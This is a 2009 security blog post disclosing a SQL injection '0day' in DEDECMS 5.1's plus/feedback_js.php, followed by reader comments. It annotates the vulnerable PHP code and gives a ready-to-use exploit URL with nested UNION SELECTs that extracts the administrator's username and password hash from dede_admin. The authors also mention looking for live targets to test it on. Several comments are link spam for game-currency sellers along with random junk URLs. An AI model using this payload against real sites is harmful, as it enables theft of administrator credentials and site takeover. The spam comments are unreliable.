
DEDECMS 5.1 feedback_js.php 0DAY

This entry was posted on Oct 11 2009

Author: st0p, Rainy'Fox
Please credit the source when reposting: http://www.st0p.org http://bbs.erpangzi.com/

Rainy'Fox and I found this vulnerability together.
Like the previous one, it is only exploitable when magic_quotes_gpc=off.

Affected version: DEDECMS 5.1
This vulnerability yields the backend administrator's account name and password hash. The vulnerable file is plus/feedback_js.php; the unfiltered parameter is $arcurl.

......
$urlindex = 0;
if(empty($arcID))
{
	$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
	// $arcurl is not filtered here
	if(is_array($row)) $urlindex = $row['id'];
	// if the query returns a row, $urlindex is set to that row's id, so we can
	// craft an id value that carries SQL into the operations below
}
if(empty($arcID) && empty($urlindex)) exit();
// exits only if both $arcID and $urlindex are empty
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
// we leave $arcID empty, so the value read back by the query above is assigned
// to $wq and interpolated into the query executed below
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
......

Now for the exploit. Heh, I had to use union twice to close the quotes properly:

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2  and ''='" from dede_admin where ''='

[screenshot: dedecms-5-1-feedback_js-php-0day]

Sigh, while Rainy'Fox and I were looking for targets to test this on, this guy actually asked whether it could be made to work with magic_quotes_gpc=on.... That idea is too devious.. and too frightening. If it really could be done, the web would be thrown into chaos again; lots of programs only call their own escaping routines when PHP's default magic_quotes_gpc is off... If it really were possible, it would be a nightmare for PHP applications...



9 Responses to “DEDECMS 5.1 feedback_js.php 0DAY”

  1. Very interesting, thanks.


  2. I stand here today humbled by the task before [url=http://www.bawwgt.com]dofus kamas[/url], grateful for the trust you have bestowed, mindful of the sacrifices borne by our [url=http://www.bawwgt.com]cheap dofus kamas[/url]. I thank President [url=http://www.bawwgt.com]dofus power leveling[/url] for his service to [url=http://www.bawwgt.com]buy dofus kamas[/url], as well as the generosity and cooperation he has shown throughout this transition.


  3. CMvNTO honoyhhectcq, [url=http://bqjmruocdqwf.com/]bqjmruocdqwf[/url], [link=http://mdbdixbzaeau.com/]mdbdixbzaeau[/link], http://njofsuttytxm.com/


  4. Only 34 days before DOFUS 2.0! December 2nd will be here before we know [url=http://www.bawwgt.com/fr]dofus kamas[/url]. On [url=http://www.bawwgt.com/fr]dofus kamas moins chers[/url] every player will discover a completely new DOFUS experience. [url=http://www.bawwgt.com/fr]acheter des dofus kamas[/url] have to be content with the reports and forums. Even so [url=http://www.bawwgt.com/fr]achat dofus kamas[/url], there's always a few of our dear players in the forums.


  5. this is a cool news. Thank you.


  6. huh... informative style..


  7. Thanks for the interesting blog.


2 Trackbacks:

  1. DEDECMS 5.1 feedback_js.php 0DAY | 鬼仔's Blog
  2. 合利工作室 » DEDECMS 5.1 feedback_js.php 0DAY
